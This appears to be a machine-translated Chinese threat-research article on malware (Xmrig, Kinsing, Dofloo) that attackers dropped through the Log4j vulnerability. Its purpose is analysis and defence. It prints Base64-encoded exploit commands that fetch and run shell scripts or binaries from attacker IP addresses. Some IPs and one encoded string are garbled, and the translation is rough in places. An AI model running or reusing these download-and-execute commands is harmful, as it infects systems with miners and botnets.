mir盘点：Log4j 漏洞带来的深远影响_

文章插图
上周，Log4j 漏洞颠覆了互联网，影响是巨大。攻击者也已经开始利用该漏，到目前为止，Uptycs 研究人员已经观察到与 coinminers、DDOS 恶意软件和一些勒索软件变种相关的攻击，这些攻击积极利用了此漏洞。
未来几天勒索软件攻击的规模可能会增加。由于该漏洞非常严重，因此可能还会发现一些可以绕过当前补丁级别或修复程序的变体。因针对这种攻击持续监控和强化系统是极其重要的。
【 mir盘点：Log4j 漏洞带来的深远影响】Uptycs 此前在博客中为其客户分享了有关补救和检测步骤的详细信息。并讨论了攻击者利用 Log4j 漏洞的各种恶意软件类别。Uptycs 威胁研究团队确定了投放在易受攻击的服务器上的不同类型的有效载荷。有效载荷包括著名的恶意软件，如 Kinsing 和 Xmrig coinminers，以及 Dofloo、Tsunami 和 Mirai 僵尸网络恶意软件。除了这些恶意软件系列，攻击者已经开始在在易受CVE-2021-44228服务器上部署勒索软件。
01 Xmrig
Xmrig 是一个开源的 Monero CPU Miner，用于挖掘 Monero 加密货币。攻击者利用 Log4j2 漏洞后，攻击者试图运行恶意 shell 脚本，其中包含下载 xmrig 矿工的命令。
命令是 93.189.42 8 ：5557，/基本/命令/ Base64/编码 KGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。
此命令下载矿工shell 脚本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6
shell 脚本（见图 1）首先杀死已经在运行的矿工二进制文件，然后从互联网下载 xmrig 矿工二进制文件并运行它。

文章插图
图 1：Shell 脚本下载并执行 Xmrig
02 Kinsing
Kinsing 是一种自我传播的加密挖掘恶意软件，以前针对配置错误的开放 Docker Daemon API 端口。Kinsing 恶意软件是用 golang 编写的，通常是通过恶意 shell 脚本删除的。kinsing shell 脚本包括几种防御规避技术，如 setfacl 使用、chattr 使用、日志删除命令等。
大规模扫描后的攻击者试图在易受攻击的服务器上放置 kinsing 二进制文件。攻击者用来删除和运行 shell 脚本的：92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.
在shell脚本：7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512）中，我们可以看到攻击者在 shell 脚本运行时放置了删除 kinsing 恶意软件二进制文件的命令（见图 2）。

文章插图
图 2：通过 shell 脚本下载 Kinsing
kinsing shell 脚本还包含与 docker 相关的命令，这些命令会杀死受害系统上已经运行的矿工进程（如果存在）。

文章插图
图 3：用于杀死已经运行的矿工的 docker 命令
03 DDoS 僵尸网络负载
在一些漏洞利用尝试中，攻击者试图删除分布式拒绝服务 (DDoS) 恶意软件二进制文件，如 dofloo、Mirai。
04 Dofloo
Dofloo （又名 AeSDdos，flooder）是一种DDoS类型的恶意软件，可对目标 IP 地址进行各种泛洪攻击，如 ICMP 和 TCP。除了泛洪攻击外，Dofloo 通过操纵受害者系统中的 rc.local 文件来确保其持久性。它的一些变体在受害计算机上部署了加密货币矿工。
在情报系统中，攻击者也在利用易受攻击的服务器后投放 Dofloo 恶意软件。由攻击者使用完整的命令是 81.30.157 43 ：1389，/基本/命令/ Base64编码/ d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaG1vZCA3NzcgYWFhOy4vYWFh。下图（参见图 4）显示了 Dofloo 对 rc.local 的操作：6e8f2da2a4facc2011522dbcdaca509195bfbdb84dbdc840382b9c40d7975548）在 Log4j 后利用中使用的变体。